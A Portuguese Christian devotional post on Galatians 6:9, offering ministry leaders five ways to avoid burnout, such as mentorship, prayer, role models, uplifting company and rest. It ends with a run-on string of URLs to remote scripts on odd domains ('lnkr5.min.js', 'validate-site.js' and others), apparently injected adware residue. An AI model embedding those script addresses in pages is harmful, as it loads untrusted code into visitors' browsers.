Cansado de fazer o bem?

Antes de falar sobre o assunto, vamos dar uma olhada no que o livro de Gálatas, capítulo 6, versículo 9, nos diz:

“E não nos cansemos de fazer o bem, pois no tempo próprio colheremos, se não desanimarmos.”

Neste texto, o apóstolo Paulo está dizendo que nós não devemos nos cansar de fazer o bem. Sim, fazer o bem cansa, cuidar de pessoas cansa, lidar com pessoas difíceis cansa. De um modo geral, lidar com pessoas exige muita paciência e, normalmente, cansa mesmo.

A realidade é que muitos líderes e Pastores de ministérios têm estado cansados de cuidar de vidas e delas não corresponderem; de amar e não haver nenhum tipo de gratidão. E, justamente, por isso, sentem vontade de largar tudo.

No entanto, o texto diz para não nos cansarmos de fazer o bem. Então, como podemos nos proteger do cansaço para que possamos continuar firmes e experimentarmos a colheita abundante?

1 – Ter alguém que se possa abrir o coração

Com toda esta dificuldade, um líder precisa contar com alguém muito espiritual para que possa abrir o seu coração.

É indispensável que o discipulado esteja acontecendo com alguma constância para que este líder seja mentoreado e receba uma palavra de ânimo e de renovo. Esta pessoa estará orando e motivando o líder a prevalecer em fé. Isso é muito importante.

2 – Ter um tempo com Deus de qualidade

Outra coisa muito importante que o líder precisa estar fazendo é tirar o seu tempo com Deus com qualidade, diariamente.

Na pressão ministerial de cuidar de vidas e lidar com os mais diversos tipos de problemas, o tempo de qualidade com Deus torna-se indispensável para dar ao líder estratégias diante da ingratidão e da traição, por exemplo.

Quando nos conectamos com Deus, somos renovados e podemos avançar de glória em glória.

3 – Espelhar-se em pessoas que venceram e superaram momentos difíceis

Quando um líder está diante de uma pressão ministerial que o leva ao cansaço, ele precisa procurar alguém em quem ele possa se espelhar. Outro líder que já tenha passado momentos parecidos, mas que conseguiu vencer, superar, continuou a fazer o bem e, hoje, vive o tempo da grande colheita.

Ter alguém em quem se possa espelhar é motivador, pois nos faz acreditar que se ele conseguiu, nós também conseguiremos! E, isso, por si só, é uma excelente estratégia para continuar fazendo o bem.

4 – Estar sempre em comunhão com pessoas cheias ânimo e de fé

Quando o líder consegue se manter em comunhão com pessoas cheias de ânimo e fé, o cansaço se dispersa com mais facilidade.

Pessoas animadas renovam nossas forças e nos dão uma nova disposição para enfrentar os desafios do ministério e nos mantém com o foco no positivo. Isso nos ajuda a mandar o “cansaço” embora e a continuar fazendo o bem.

5 – Parar para descansar

Pode parecer “óbvio”, mas, acredite, não é tão simples assim…

É muito comum nos depararmos com líderes que não tiram tempo para descanso. Querem resolver “todos os problemas do mundo” sem perceber que podem estar fazendo mais do que o próprio Deus lhes tenha pedido, ou seja, estão fazendo na sua força, o que traz cansaço e frustração.

Agora, quando o líder entende a importância do descanso, ele percebe que não há maneira melhor para ser renovado no seu corpo e na sua mente.

Sabe, está tudo bem você sair um pouco para aliviar a mente. Está tudo bem você se afastar um pouco e dar uma parada. Quem sabe não é o que você está precisando para voltar com força total?

Dar “um passo para trás” não significa desistir. Antes, significa renovar as forças para que se possa fazer o que Deus nos chamou para fazer, com excelência.

Se você se interessa por conteúdos como este e deseja receber informações exclusivas ou em primeira mão, cadastre-se na lista de e-mails exclusiva de amigos através do link www.liderancadesucesso.com.br/cadastro/ e faça parte da comunidade de líderes que tem feito a diferença.

http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=33http://pagevalidation.space/addons/lnkr5.min.jshttp://pagevalidation.space/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_